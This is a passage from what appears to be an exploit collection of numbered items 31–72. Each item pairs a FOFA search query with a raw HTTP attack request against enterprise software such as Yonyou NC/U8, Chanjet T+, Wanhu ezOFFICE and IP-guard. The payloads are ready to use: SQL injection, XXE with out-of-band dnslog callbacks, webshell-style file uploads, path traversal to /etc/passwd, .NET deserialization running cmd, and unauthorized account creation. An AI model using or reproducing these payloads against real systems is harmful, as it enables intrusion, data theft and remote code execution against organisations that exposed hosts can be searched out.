Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version = NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Uploaded file path:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Uploaded file path:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword interface.
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm that the vulnerability exists.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

